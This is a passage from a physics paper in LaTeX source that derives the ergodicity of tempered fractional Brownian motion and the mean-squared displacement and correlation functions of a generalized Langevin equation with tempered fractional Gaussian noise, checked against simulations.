Next we consider the ergodicity of tfBm and the convergence speed of the variance of the time-average mean-squared displacement, $\bar{\delta}^2(B_{\alpha,\lambda}(t))=\int_0^{t-\Delta}[B_{\alpha,\lambda}(t'+\Delta)-B_{\alpha,\lambda}(t')]^2\rmd t'/(t-\Delta)$, where $\Delta$ is the lag time. If the average of $\bar{\delta}^2(B_{\alpha,\lambda}(t))$ equals to the ensemble average of $B_{\alpha,\lambda}(t)$ and the variance of $\bar{\delta}^2(B_{\alpha,\lambda}(t))$ tends to zero when the measurement time is long, the process tfBm is ergodic \cite{Deng}; it is indeed (see (\ref{qi}) and (\ref{fang}) and their derivations presented in \ref{AppendixA}). In fact,
the variance of $\bar{\delta}^2(B_{\alpha,\lambda}(t))$ is a measure of ergodicity breaking and the ergodicity breaking parameter is defined as
\begin{eqnarray}
E_B(B_{\alpha,\lambda}(t))=\frac{\textrm{Var}[\bar{\delta}^2(B_{\alpha,\lambda}(t))]}{\langle \bar{\delta}^2(B_{\alpha,\lambda}(t))\rangle^2}=\frac{\langle [\bar{\delta}^2(B_{\alpha,\lambda}(t))]^2\rangle-\langle \bar{\delta}^2(B_{\alpha,\lambda}(t))\rangle^2}{\langle \bar{\delta}^2(B_{\alpha,\lambda}(t))\rangle^2}.\nonumber
\end{eqnarray}
For tfBm, from \ref{AppendixA} the average of $\bar{\delta}^2(B_{\alpha,\lambda}(t))$ is
\begin{eqnarray}\label{qi}
\langle\bar{\delta}^2(B_{\alpha,\lambda}(t))\rangl
=C_ {\Delta}^2|\Delta|^{2H},
\end{eqnarray}
hence $\langle\bar{\delta}^2\rangle=\langle B_{\alpha,\lambda}^2\rangle$ for all times; for long times and moderate $\lambda$, the variance of $\bar{\delta}^2(B_{\alpha,\lambda}(t))$ is
\begin{eqnarray}\label{fang}
\textrm{Var}[\bar{\delta}^2(B_{\alpha,\lambda}(t))
\simeq D\frac{4\Gamma^2(H+\frac{1}{2})}{(2\lambda)^{2H+1}}\Delta^{2H}t^{-1},
\end{eqnarray}
where
$D=\int_0^{\infty}\rmd\tau[(1+\tau)^{H-\frac{1}{2}}\rme^{-\lambda\Delta(1+\tau)}+|\tau-1|^{H-\frac{1}{2}}\rme^{-\lambda|\Delta(\tau-1)|}-2\tau^{H-\frac{1}{2}}\rme^{-\lambda\Delta\tau}]^2$.
Thus we have $E_B(B_{\alpha,\lambda}(t))\simeq 4D\Gamma^2(H+1/2)/[(2\lambda)^{2H+1}C_{\Delta}^4\Delta^{2H}]t^{-1}$, which tends to zero with the speed $t^{-1}$ for $H \in (0,1)$ as $t\rightarrow\infty$.
The simulation result for ergodicity breaking parameter $E_B(B_{\alpha,\lambda}(t))$ is shown in Figure \ref{fig:0}.
On the other hand, for the limit $\lambda t\rightarrow0$, $C_t^2$ tends to a constant. In this case, (\ref{covariance}) reduces to the covariance function of fractional Brownian motion (fBm). Then the evolution of the ergodicity breaking parameter $E_B(B_{\alpha,\lambda}(t))$ is recovered to that of fBm \cite{Deng}.
\begin{figure}
\flushright
\includegraphics[scale=0.4]{0eps.eps}\includegraphics[scale=0.4]{01eps.eps}
\caption{Solid (red) lines are the simulation results for $E_B(x(t))$. The parameters $H$, $\lambda$, $\Delta$ and $T$ are, respectively, taken as $H=0.8$ (left panel (a)), $H=0.4$ (right panel (b)), $\lambda=0.1$, $\Delta=1$ and $T=300$. The 5000 trajectories are sampled.
}
\label{fig:0}
\end{figure}
\subsection{Tempered fractional Gaussian noise}
Given a tfBm (\ref{PDF}), we can define the tempered fractional Gaussian noise (tfGn)
\begin{eqnarray}\label{2.9}
\gamma(t)=\frac{B_{\alpha,\lambda}(t+h)-B_{\alpha,\lambda}(t)}{h},
\end{eqnarray}
being similar to the definition of fractional Gaussian noise (fGn) \cite{Mandelbrot:68}, where $h$ is small and $h\ll t$.
Based on the covariance function (\ref{covariance}) of $B_{\alpha,\lambda}(t)$ and its zero mean, one can easily obtain that the mean of tfGn is $\langle \gamma(t)\rangle=0$ and its covariance is
\begin{eqnarray*}
\fl \langle\gamma(t_1)\gamma(t_2)\rangle
=\frac{1}{h^2}\langle(B_{\alpha,\lambda}(t_1+h)-B_{\alpha,\lambda}(t_1))(B_{\alpha,\lambda}(t_2+h)-B_{\alpha,\lambda}(t_2))\rangle \nonumber \\
\fl\qquad\quad\qquad=\frac{1}{2h^2}(C_{t_1-t_2+h}^2|t_1-t_2+h|^{2H}+C_{t_1-t_2-h}^2|t_1-t_2-h|^{2H}-2C_{t_1-t_2}^2|t_1-t_2|^{2H}),
\end{eqnarray*}
which means that the tfGn is a stationary Gaussian process.
For a fixed $\lambda$, the asymptotic behavior of the covariance function is $\langle\gamma(0)\gamma(t)\rangle\simeq-\Gamma(H+1/2)\lambda^2(2\lambda)^{-H-1/2}t^{H-1/2}\rme^{-\lambda t}$ for large $ t$ and $\langle\gamma(0)\gamma(t)\rangle\simeq C_t^2H(2H-1)t^{2H-2}$ with a positive constant $C_t^2$ for small $ t$ (for the details of derivation, see \ref{AppendixB}).
\section{Generalized Langevin equation with tempered fractional Gaussian noise}\label{three}
\setcounter{equation}{0}
We discuss the dynamics of the generalized Langevin equation with tempered fractional Gaussian noise for free particles, including the underdamped and overdamped cases. The properties of the correlation function of the equation under external potential are also discussed.
\subsection{Dynamical behaviors for free particles}
\subsubsection{Underdamped generalized Langevin equation}
We know that for large $t$ the MSD of fBm is like $ t^{2H}$ and the one of the corresponding Langevin equation is like $ t^{2-2H}$. In the above section, it is shown that tfBm is localization, i.e., its MSD goes like $t^0$. Can we expect that the MSD of the tfLe goes like $t^2$ for large $t$? The answer is yes.
Based on the second fluctuation-dissipation theorem \cite{Kubo}, which links the dissipation memory kernel $K(t)$ with the autocorrelation function of internal noise $F(t)$: $\langle F(t_1)F(t_2)\rangle=k_BT\xi K(t_1-t_2)$, the tfLe can be written as
\begin{eqnarray}\label{PDC}
m\frac{\rmd ^2x(t)}{\rmd t^2}=-\xi \int_0^tK(t-\tau)\frac{\rmd x}{\rmd\tau}\rmd\tau+F(t),
\end{eqnarray}
with $\dot x(0)=v_0$, $x(0)=0$, where $v_0$ is the initial velocity, $F(t)=\sqrt{2k_BT\xi}\gamma(t)$ is the internal noise with tfGn $\gamma(t)$, and $K(t)=2\langle\gamma(0)\gamma(t)\rangle=\frac{1}{h^2}(C_{t+h}^2|t+h|^{2H}+C_{t-h}^2|t-h|^{2H}-2C_t^2|t|^{2H})$ with $0<H<1$.
In this case, the fluctuation and dissipation stem from the same source and the system will finally reach the equilibrium state.
Taking Laplace transform of (\ref{PDC}) leads to
\begin{eqnarray} \label{3.2}
x(s)=\frac{F(s)+mv_0}{ms^2+\xi s K(s)}.
\end{eqnarray}
For convenience, denoting $C_t^2t^{2H}$ by $f(t)$, then $K(s)=\mathcal{L}[K(t)]=\frac{1}{h^2}(\rme^{sh}f(s)+\rme^{-sh}f(s)-2f(s))$. No matter $s\rightarrow0$ or $s\rightarrow\infty$, $sh$ is always small since $h\ll t$. So along with a Taylor's series expansion, we have $K(s)\simeq s^2f(s),\nonumber$ for $s\rightarrow0$ or $s\rightarrow\infty$. That is to say, the asymptotic expression of $x(s)$ is
\begin{eqnarray}\label{PDW}
x(s)\simeq\frac{F(s)+mv_0}{ms^2+\xi s^3 f(s)}
\end{eqnarray}
and
\begin{eqnarray}\label{PDWX}
v(s)\simeq\frac{F(s)+mv_0}{ms+\xi s^2 f(s)}.
\end{eqnarray}
Based on (\ref{PDW}) and (\ref{PDWX}), we do the dynamics analysis for different cases.
\textit{Case I} ($t$ is large, i.e., $s \rightarrow 0$, and $H \in (0,1)$): For moderate $\lambda$, $\lambda t$ is large, say, $\lambda t> 10$. Then $f(t)=C_t^2t^{2H}\simeq 2\Gamma(2H)(2\lambda)^{-2H}$.
By final value theorem, we have $\lim\limits_{s\to0}f(s)=2\Gamma(2H)(2\lambda)^{-2H}/s$; substituting it into (\ref{PDW}) leads to
\begin{eqnarray}
x(s)\simeq\frac{F(s)+mv_0}{As^2}
\end{eqnarray}
with $A=m+2\xi \Gamma(2H)(2\lambda)^{-2H}$.
Then
\begin{eqnarray}
x(t)\simeq\frac{1}{A}\int_0^t\tau F(t-\tau)\rmd\tau+\frac{mv_0}{A}t.
\end{eqnarray}
Hence $\langle x(t)\rangle\simeq\frac{mv_0}{A}t$ for large $t$, and
\begin{eqnarray}
\langle x^2(t)\rangle\simeq\frac{2}{A^2}\int_0^t\int_0^{t_1}\rmd t_2\rmd t_1t_1t_2\langle F(t-t_1)F(t-t_2)\rangle+\frac{m^2v_0^2}{A^2}t^2,
\end{eqnarray}
with
$\langle F(t-t_1)F(t-t_2)\rangle=k_BT\xi h^{-2}
(C_{t_1-t_2+h}^2|t_1-t_2+h|^{2H}+C_{t_1-t_2-h}^2|t_1-t_2-h|^{2H}-2C_{t_1-t_2}^2|t_1-t_2|^{2H})$.
Let $g(t_1)=\int_0^{t_1}t_2\langle F(t-t_1)F(t-t_2)\rangle \rmd t_2$. Using the property of convolution and Taylor's series expansion, we have $g(s)=\mathcal{L}[g(t_1)]\simeq k_BT\xi f(s)$. So $g(t_1)\simeq k_BT\xi f(t_1)$ for large $t_1$. Then
\begin{eqnarray}\label{xx}
\langle x^2(t)\rangle&\simeq\frac{2}{A^2}\int_0^tt_1g(t_1)\rmd t_1+\frac{m^2v_0^2}{A^2}t^2 \nonumber\\
&\simeq\frac{2k_BT\xi}{A^2}\int_0^tt_1C_{t_1}^2t_1^{2H}\rmd t_1+\frac{m^2v_0^2}{A^2}t^2 \nonumber\\
&\simeq\frac{2k_BT\xi\Gamma(2H)+m^2v_0^2(2\lambda)^{2H}}{A^2(2\lambda)^{2H}}t^2
\end{eqnarray}
for $t\rightarrow\infty$. Eq. (\ref{xx}) is confirmed by the numerical simulations; see Figure \ref{fig:1}. And the MSD of the system is
\begin{eqnarray}
\langle(\Delta x)^2\rangle=\langle[x(t)-\langle x(t)\rangle]^2\rangle
\simeq\frac{2k_BT\xi\Gamma(2H)}{A^2(2\lambda)^{2H}}t^2,
\end{eqnarray}
displaying the ballistic diffusion.
\begin{figure}
\flushright
\includegraphics[scale=0.37]{1eps.eps}\\
\caption{Theoretical result (\ref{xx}) (black dashed line) and computer simulation one sampled over 1000 trajectories (red solid line), plotted for $H=0.7$, $\lambda=0.1$, $T=500$, $k_BT=1$, $\xi=1$, $m=1$, and $v_0=1$.
}\label{fig:1}
\end{figure}
Besides, let us further consider the autocorrelation function of the position $x(t)$. After making double Laplace transforms of the autocorrelation function of internal noise $\langle F(t_1)F(t_2)\rangle$, we have
\begin{eqnarray}
\langle F(s_1)F(s_2)\rangle=k_BT\xi\frac{s_1^2f(s_1)+s_2^2f(s_2)}{s_1+s_2}.
\end{eqnarray}
Then
\begin{eqnarray}\label{ii}
\langle x(s_1)x(s_2)\rangle&=\frac{\langle F(s_1)F(s_2)\rangle+m^2v_0^2}{A^2s_1^2s_2^2}\nonumber\\
&=\frac{k_BT\xi}{A^2}\frac{s_1^2f(s_1)+s_2^2f(s_2)}{(s_1+s_2)s_1^2s_2^2}+\frac{1}{A^2}\frac{m^2v_0^2}{s_1^2s_2^2}.
\end{eqnarray}
Taking inverse Laplace transforms of (\ref{ii}) and letting $t_1, t_2$ tend to infinity, we obtain
\begin{eqnarray}
\langle x(t_1)x(t_2)\rangle \simeq\left(\frac{2k_BT\xi\Gamma(2H)}{A^2(2\lambda)^{2H}}+\frac{m^2v_0^2}{A^2}\right) t_1t_2,
\end{eqnarray}
which results in (\ref{xx}) when $t_1=t_2$.
Furthermore, if $\lambda$ is moderate and $t\rightarrow\infty$, the velocity
\begin{eqnarray}
v(t)&\simeq\frac{1}{A}\int_0^t F(\tau)\rmd\tau+\frac{mv_0}{A}
=\frac{\sqrt{2k_BT\xi}}{A}B_{\alpha,\lambda}(t)+\frac{mv_0}{A}.
\end{eqnarray}
Then we have $\langle v(t)\rangle\simeq\frac{mv_0}{A}$ and the autocorrelation function of $v(t)$ is
\begin{eqnarray}\label{vv}
\langle v(t_1)v(t_2)\rangle&\simeq\frac{2k_BT\xi}{A^2}\langle B_{\alpha,\lambda}(t_1)B_{\alpha,\lambda}(t_2)\rangle+\frac{m^2v_0^2}{A^2}\nonumber\\
&=\frac{k_BT\xi}{A^2}(C_{t_1}^2t_1^{2H}+C_{t_2}^2t_2^{2H}-C_{t_1-t_2}^2|t_1-t_2|^{2H})+\frac{m^2v_0^2}{A^2}.
\end{eqnarray}
If $t_1=t_2=t$, then
\begin{eqnarray}
\langle v^2(t)\rangle
&=\frac{2k_BT\xi}{A^2}C_t^2t^{2H}+\frac{m^2v_0^2}{A^2}\simeq \frac{4k_BT\xi\Gamma(2H)+m^2v_0^2(2\lambda)^{2H}}{A^2(2\lambda)^{2H}}
\end{eqnarray}
as $t\rightarrow\infty$. From (\ref{vv}), the second moment of position $x(t)$ is
\begin{eqnarray}
\fl\langle x^2(t)\rangle
=2\int_0^t\int_0^{t_1}\rmd t_2\rmd t_1\langle v(t_1)v(t_2)\rangle\nonumber\\
\fl\qquad\quad=\frac{2k_BT\xi}{A^2}\int_0^t\int_0^{t_1}\rmd t_2\rmd t_1(C_{t_1}^2{t_1}^{2H}+C_{t_2}^2{t_2}^{2H}-C_{t_1-t_2}^2|t_1-t_2|^{2H})+\frac{m^2v_0^2}{A^2}t^2\nonumber\\
\fl\qquad\quad\simeq\frac{2k_BT\xi\Gamma(2H)+m^2v_0^2(2\lambda)^{2H}}{A^2(2\lambda)^{2H}}t^2,
\end{eqnarray}
where $C_t^2t^{2H}\simeq 2\Gamma(2H)(2\lambda)^{-2H}$ for large $\lambda t$ is used; Eq. (\ref{xx}) is confirmed again. The correlation function of $x(t)$ and $v(t)$ is
\begin{eqnarray}
\langle x(t)v(t)\rangle&=\frac{1}{2}\frac{\rmd\langle x^2(t)\rangle}{\rmd t}\simeq\frac{2k_BT\xi\Gamma(2H)+m^2v_0^2(2\lambda)^{2H}}{A^2(2\lambda)^{2H}}t.
\end{eqnarray}
\textit{Remark}: There is another way to obtain the asymptotic expression of $f(s)$ for small $s$. By using the formula \cite{Srivastava}:
\begin{eqnarray*}
I_{\rho}^{\mu}(s)&=\int_0^{\infty}\rme^{-st}t^{\mu-1}K_{\nu}(\alpha t^{\rho})\rmd t\nonumber\\
&=\frac{2^{(\mu-2\rho)/\rho}}{\rho \alpha^{\mu/\rho}}\sum\frac{(-s)^n}{n!}\Big(\frac{2}{\alpha}\Big)^{n/\rho}\Gamma\Big(\frac{\mu+n}{2\rho-\frac{1}{2}\nu}\Big)\Gamma\Big(\frac{\mu+n}{2\rho+\frac{1}{2}\nu}\Big),
\end{eqnarray*}
where $\rho>0$, $\rm{Re}(s)>0$, $ \rm{Re}(\alpha)>0$, $\rm{Re}(\mu/\rho)>|\rm{Re}(\nu)|$ and $K_{\nu}(\alpha t)$ is the modified Bessel function of the second kind, we obtain the Laplace transform of $f(t)\,(=C_t^2t^{2H})$ as
\begin{eqnarray*
\fl f(s)=\frac{2\Gamma(2H)(2\lambda)^{-2H}}{s}-\frac{\Gamma(H+\frac{1}{2})}{\sqrt{\pi}\lambda^{2H+1}}\sum\frac{(-s)^n}{n!}\Big(\frac{2}{\lambda}\Big)^n\Gamma\Big(\frac{H+1+n}{2-\frac{1}{2}H}\Big)\Gamma\Big(\frac{H+1+n}{2+\frac{1}{2}H}\Big).
\end{eqnarray*}
So $f(s) \simeq\frac{2\Gamma(2H)(2\lambda)^{-2H}}{s}$ for small $s$.
\textit{Case II} ($s$ is large, i.e., $t \rightarrow 0$, and $H \in (\frac{1}{2},1)$):
For moderate or small $\lambda$, $\lambda t\rightarrow0$. Then we have $C_t^
\simeq 2D_H\Gamma^2(H+1/2)$ and $f(t)\simeq 2D_H\Gamma^2(H+1/2)t^{2H}$ with its Laplace transform $f(s) \simeq 2D_H\Gamma^2(H+1/2)\Gamma(2H+1)s^{-1-2H}$. So (\ref{PDW}) becomes
\begin{eqnarray} \label{3.18}
x(s)\simeq\frac{F(s)+mv_0}{ms^2+ 2\xi D_H\Gamma^2(H+\frac{1}{2})\Gamma(2H+1)s^{2-2H} }\simeq\frac{F(s)+mv_0}{ms^2}
\end{eqnarray}
for large $s$. Taking inverse Laplace transform on Eq. (\ref{3.18}) leads to
\begin{eqnarray}
x(t)\simeq\frac{1}{m}\int_0^t\tau F(t-\tau)\rmd\tau+v_0t.
\end{eqnarray}
Then the mean $\langle x(t)\rangle\simeq v_0t$. Similarly to the case $t\rightarrow \infty$, we obtain
\begin{eqnarray}\label{xiao}
\langle x^2(t)\rangle&\simeq\frac{2}{m^2}\int_0^t\int_0^{\tau_1}\rmd\tau_2\rmd\tau_1\tau_1\tau_2\langle F(t-\tau_1)F(t-\tau_2)\rangle+v_0^2t^2\nonumber \\
&=\frac{8D_H\Gamma^2(H+\frac{1}{2})k_BT\xi}{m^2}\int_0^t\tau_1^{2H+1}\rmd\tau_1+v_0^2t^2\nonumber\\
&=\frac{4D_H\Gamma^2(H+\frac{1}{2})k_BT\xi}{m^2(H+1)}t^{2H+2}+v_0^2t^2\nonumber\\
&\simeq v_0^2t^2
\end{eqnarray}
for small $t$. Note that for short times we have $\langle x^2(t)\rangle\simeq\frac{k_BT}{m}t^2$ if the thermal initial condition $\langle v_0^2\rangle=\frac{k_BT}{m}$ is assumed. Figure \ref{2} numerically confirms the theoretical result. Naturally, in this case, $v(t)\simeq \frac{1}{m}\int_0^tF(\tau)\rmd\tau+v_0$. So $\langle v(t)\rangle\simeq v_0$ and $\langle v^2(t)\rangle\simeq\frac{4k_BT\xi D_H\Gamma^2(H+\frac{1}{2})}{m^2}t^{2H}+v_0^2\simeq v_0^2$ for small $t$.
\begin{figure}
\flushright
\includegraphics[scale=0.37]{2eps.eps}\\
\caption{Theoretical result (\ref{xiao}) (blue dashed line) and numerical one sampled over $1000$ trajectories (red solid line), plotted for $H=0.8$, $\lambda=0.1$, $T=100$, and $v_0=1$. }\label{2}
\end{figure}
\textit{Case III} ($\lambda$ is small, $t$ is large, and $H \in (\frac{1}{2},1)$):
If $\lambda t\rightarrow\infty$, it reduces to \textit{Case I}. Now we only consider the case that $\lambda t$ is small. As the second case, when $\lambda t$ is small, $C_t^2\simeq 2D_H\Gamma^2(H+1/2)$. Then (\ref{PDW}) becomes
\begin{eqnarray}
x(s)&\simeq\frac{F(s)+mv_0}{ms^2+ 2\xi D_H\Gamma^2(H+\frac{1}{2})\Gamma(2H+1)s^{2-2H} }\nonumber\\
&\simeq\frac{F(s)+mv_0}{2\xi D_H\Gamma^2(H+\frac{1}{2})\Gamma(2H+1)s^{2-2H}}
\end{eqnarray}
for small $s$, which has the inverse Laplace transform
\begin{eqnarray}
x(t)\simeq P\int_0^tF(t-\tau)\tau^{1-2H}\rmd\tau+mv_0 P t^{1-2H}
\end{eqnarray}
with $P=\frac{1}{2\xi D_H\Gamma^2(H+\frac{1}{2})\Gamma(2H+1)\Gamma(2-2H)}$. So finally we obtain $\langle x(t)\rangle\simeq mv_0 P t^{1-2H}$ and the MSD is
\begin{eqnarray}\label{zhong}
\langle x^2(t)\rangle\simeq\frac{k_BT}{\xi D_H\Gamma^2(H+\frac{1}{2})\Gamma(2H+1)\Gamma(3-2H)}t^{2-2H}.
\end{eqnarray}
Similarly, $v(t)\simeq\frac{1}{m}\int_0^tF(\tau)E_{2H}(-B(t-\tau)^{2H})\rmd\tau+v_0E_{2H}(-Bt^{2H})$ by making the inverse Laplace transform of $v(s)\simeq\frac{F(s)+mv_0}{ms+ 2\xi D_H\Gamma^2(H+\frac{1}{2})\Gamma(2H+1)s^{1-2H} }$, where $B=2\xi D_H\Gamma^2(H+\frac{1}{2})\Gamma(2H+1)m^{-1}$ and $E_{\alpha}(z)$ is the particular case of the generalized Mittag-Leffler function \cite{Podlubny}
\begin{eqnarray}
E_{\alpha,\beta}(z)=\sum_{k=0}^{\infty}\frac{z^k}{\Gamma(\alpha k+\beta)},\qquad\alpha>0,\qquad \beta>0 \nonumber
\end{eqnarray}
with $E_{\alpha}(z)=E_{\alpha,1}(z)$. The asymptotic expression of the generalized Mittag-Leffler function for $z\rightarrow\infty$ is $E_{\alpha,\beta}(-z)\simeq\frac{z^{-1}}{\Gamma(\beta-\alpha)}$, where $0<\alpha<1$ or $1<\alpha<2$.
It can be noted that $\langle F(t_1)F(t_2)\rangle\simeq4k_BT\xi D_H\Gamma^2(H+1/2)H(2H-1)|t_1-t_2|^{2H-2}$ when $\lambda t$ is small, being similar to the autocorrelation function of fGn \cite{Deng}; and the expression of $v(t)$ is similar to the one of fLe. So in this case, the asymptotic behavior of $\langle v(t)\rangle$ and $\langle v^2(t)\rangle$ is consistent with that of fLe. Thus $\langle v(t)\rangle\simeq v_0E_{2H}(-Bt^{2H})\simeq t^{-2H}$ and $\langle v^2(t)\rangle$ decays like $t^{-4H}$ for large $t$ \cite{Eric}.
From the above discussions, we know that the MSD of tfLe strongly depends on the value of $\lambda$ and $t$. When $\lambda t$ is small, it displays the same asymptotic behavior as the one of fLe \cite{Deng}. As time goes on, for fixed $\lambda$ the MSD of tfLe transmits as $t^2\to t^{2-2H}\to t^2$; the smaller $\lambda$ is, the longer the time of the MSD behaves as $t^{2-2H}$. See Figure \ref{3} for the demonstration of the results.
\begin{figure}
\flushright
\includegraphics[scale=0.37]{3eps.eps}\\
\caption{Theoretical results (\ref{xiao}) (blue dashed line), (\ref{zhong}) (green dotted-dashed line), (\ref{xx}) (black solid line), and numerical result sampled over $1000$ trajectories (red data points), plotted for $H=0.7$, $\lambda=0.001$, $T=2\times 10^4$, $k_BT=1$, $\xi=1$, $m=1$, $v_0=1$, and $D_H=\frac{1}{2}$.
}\label{3}
\end{figure}
\subsubsection{Overdamped generalized Langevin equation}
The overdamped generalized Langevin equation without Newton's acceleration term reads as
\begin{eqnarray}
0=-\xi \int_0^tK(t-\tau)\frac{\rmd x}{\rmd\tau}\rmd\tau+F(t),
\end{eqnarray}
where $K(t)$ and $F(t)$ are the same as the ones in Eq. (\ref{PDC}). For moderate $\lambda$, taking the same procedure as above subsection, we can easily obtain that $\langle x(t)\rangle=0$ and
\begin{eqnarray}\label{over1}
\langle x^2(t)\rangle\simeq\frac{2k_BT\xi\Gamma(2H)}{(2\xi\Gamma(2H)(2\lambda)^{-2H})^2(2\lambda)^{2H}}t^2
\end{eqnarray}
for large $t$, being the same as the underdamped case (\ref{PDC}). For short times,
\begin{eqnarray}
x(t)\simeq\frac{1}{2D_H\Gamma^2(H+\frac{1}{2})\xi\Gamma(2H+1)\Gamma(2-2H)}\int_0^tF(t-\tau)\tau^{1-2H}\rmd\tau;
\end{eqnarray}
then we have $\langle x(t)\rangle=0$ and the MSD
\begin{eqnarray}\label{over2}
\langle x^2(t)\rangle\simeq\frac{k_BT}{\xi D_H\Gamma^2(H+\frac{1}{2})\Gamma(2H+1)\Gamma(3-2H)}t^{2-2H}.
\end{eqnarray}
It can be noted that for short times, the MSD of the overdamped tfLe transits from $t^{2-2H}$ to $t^2$, and it behaves the same as the one of overdamped fLe \cite{Deng} for small $\lambda t$. See Figure \ref{3-1} for the numerical simulations, which verify (\ref{over1}) and (\ref{over2}).
\begin{figure}
\flushright
\includegraphics[scale=0.37]{31eps.eps}\\
\caption{Theoretical results (\ref{over2}) (blue dashed line) and (\ref{over1}) (black dotted-dashed line), and numerical result sampled over $1000$ trajectories (red solid line), plotted for $H=0.6$, $\lambda=0.1$, $T=500$, $k_BT=1$, $\xi=1$, and $D_H=\frac{1}{2}$.
}\label{3-1}
\end{figure}
\subsection{Harmonic potential}
Now we further consider the tfLe (\ref{PDC}) with external potential $U(x)$, i.e.,
\begin{eqnarray}
m\frac{\rmd^2x(t)}{\rmd t^2}=-\xi \int_0^tK(t-\tau)\frac{\rmd x}{\rmd\tau}\rmd\tau-U'(x)+F(t),
\end{eqnarray}
where $-U'(x)$ is an external force. If the external potential is a harmonic potential $U(x)=\frac{1}{2}m\omega^2x^2(t)$, where $\omega$ is the frequency of the oscillator, then we have
\begin{eqnarray}\label{ex}
m\frac{\rmd^2x(t)}{\rmd t^2}=-\xi \int_0^tK(t-\tau)\frac{\rmd x}{\rmd\tau}\rmd\tau-m\omega^2x(t)+F(t).
\end{eqnarray}
In what follows we analyze the normalized displacement correlation function, which is defined by
\begin{eqnarray}
C_x(t)=\frac{\langle x(t)x(0)\rangle}{\langle x^2(0)\rangle},\nonumber
\end{eqnarray}
under the thermal initial conditions $\langle F(t)x(0)\rangle=0$, $\langle x^2(0)\rangle=\frac{k_BT}{m\omega^2}$, and $\langle x(0)v(0)\rangle=0$. Making Laplace transform of (\ref{ex}) leads to
\begin{eqnarray}
x(s)=\frac{(ms+\xi K(s))x(0)+F(s)+mv(0)}{ms^2+\xi s K(s)+m\omega^2}.
\end{eqnarray}
Then
\begin{eqnarray}
C_x(s)=\frac{\langle x(s)x(0)\rangle}{\langle x^2(0)\rangle}=\frac{ms+\xi K(s)}{ms^2+\xi s K(s)+m\omega^2},
\end{eqnarray}
which results in
\begin{eqnarray}
C_x(t)=1-m\omega^2I(t)
\end{eqnarray}
with $I(s)=\frac{s^{-1}}{ms^2+\xi s K(s)+m\omega^2}$.
$K(s)$ and $f(t)$ are given below Eq. (\ref{3.2}). Here we carefully take the asymptotic expression of $f(t)$ as
\begin{eqnarray}
f(t)\simeq \frac{2 \Gamma(2H)}{(2\lambda)^{2H}}-\frac{2 \Gamma(H+\frac{1}{2})}{(2\lambda)^{H+\frac{1}{2}}}t^{H-\frac{1}{2}}\rme^{-\lambda t}.
\end{eqnarray}
Then
\begin{eqnarray} \label{3.34}
I(s)\simeq\frac{s^{-1}}{as^2-bs^3(s+\lambda)^{-H-\frac{1}{2}}+m\omega^2},
\end{eqnarray}
where $a=m+2\xi \Gamma(2H)(2\lambda)^{-2H}$ and $b=2\xi \Gamma(H+\frac{1}{2})^2(2\lambda)^{-H-\frac{1}{2}}$.
The approximation (\ref{3.34}) is valid just for small $\omega$; for large $\omega$, the convergence region of the approximation of $I(s)$ may be different from the one of $I(s)$. One can note that the approximation in ((\ref{3.34}) is not sensitive to the value of $H$, which is also illustrated by simulations (see Figs. \ref{you} and \ref{0-8}). We simply take $H=\frac{1}{2}$; for other values of $H$, one can use the techniques in \cite{Burov, Burov-1} to make inverse Laplace transform of $I(s)$, but the calculations are very complicated.
Then
\begin{eqnarray}\label{i}
I(s)\simeq\frac{s^{-1}(s+\lambda)}{(a-b)s^3+a\lambda s^2+m\omega^2s+m\omega^2\lambda}\simeq\frac{1+\lambda s^{-1}}{a\lambda s^2+m\omega^2s+m\omega^2\lambda}.
\end{eqnarray}
Rewrite (\ref{i}) as $a\lambda I(s)=\frac{1}{P(s)}+\frac{s^{-1}\lambda}{P(s)}$ with $P(s)=s^2+\frac{m\omega^2}{a\lambda}s+\frac{m\omega^2}{a}$. Then the solutions of $P(s)=0$ are $z_1=\alpha+\rmi\beta$ and $z_2=\alpha-\rmi\beta$, where $\alpha=-\frac{m\omega^2}{2a\lambda}$ and $\beta=\frac{\omega\sqrt{4ma\lambda^2-m^2\omega^2}}{2a\lambda}$. The roots are complex on account of the small $\omega$ satisfing $m\omega^2<4a\lambda^2$. Denoting
\begin{eqnarray}
A_k=\frac{1}{\frac{\rmd P(s)}{\rmd s}|_{s=z_k}},\nonumber
\end{eqnarray}
we have
\begin{eqnarray}
a\lambda I(s)=\sum_{k=1}^{2}\frac{A_k}{s-z_k}+\lambda\sum_{k=1}^{2}\frac{A_ks^{-1}}{s-z_k}
\end{eqnarray}
and
\begin{eqnarray}\label{h}
a\lambda I(t)&=A_1\rme^{z_1t}+A_2\rme^{z_2t}+\lambda\left[\frac{A_1}{z_1}(\rme^{z_1t}-1)+\frac{A_2}{z_2}(\rme^{z_2t}-1)\right]\nonumber\\
&=(A_1+A_2+\lambda\frac{A_1}{z_1}+\lambda\frac{A_2}{z_2})\rme^{\alpha t}\cos(\beta t)\nonumber\\
&\quad +(A_1-A_2+\lambda\frac{A_1}{z_1}-\lambda\frac{A_2}{z_2})\rmi\rme^{\alpha t}\sin(\beta t)-\lambda(\frac{A_1}{z_1}+\frac{A_2}{z_2}),
\end{eqnarray}
where $A_1=\frac{1}{z_1-z_2}$ and $A_2=\frac{1}{z_2-z_1}$.
Plugging the concrete expressions of $A_k$ into (\ref{h}) leads to
\begin{eqnarray}
I(t)=&\frac{1}{\sqrt{4m\omega^2a\lambda^2-m^2\omega^4}}\rme^{-\frac{m\omega^2}{2a\lambda} t}\sin\left(\frac{\omega\sqrt{4ma\lambda^2-m^2\omega^2}}{2a\lambda} t\right)\nonumber\\
&-\frac{1}{m\omega^2}\rme^{-\frac{m\omega^2}{2a\lambda} t}\cos\left(\frac{\omega\sqrt{4ma\lambda^2-m^2\omega^2}}{2a\lambda} t\right)+\frac{1}{m\omega^2}
\end{eqnarray}
and the normalized displacement correlation function is
\begin{eqnarray}\label{cx}
C_x(t)&=1-m\omega^2 I(t)\nonumber\\
&=2\lambda \sqrt{\frac{a}{4a\lambda^2-m\omega^2}}\rme^{-\frac{m\omega^2}{2a\lambda} t}\sin\left(\frac{\omega\sqrt{4ma\lambda^2-m^2\omega^2}}{2a\lambda}t+\theta\right),
\end{eqnarray}
where $\theta=\arctan(-\frac{\sqrt{4ma\lambda^2-m^2\omega^2}}{m\omega})$. It shows that for small $\omega$, the phase, amplitude, and period are
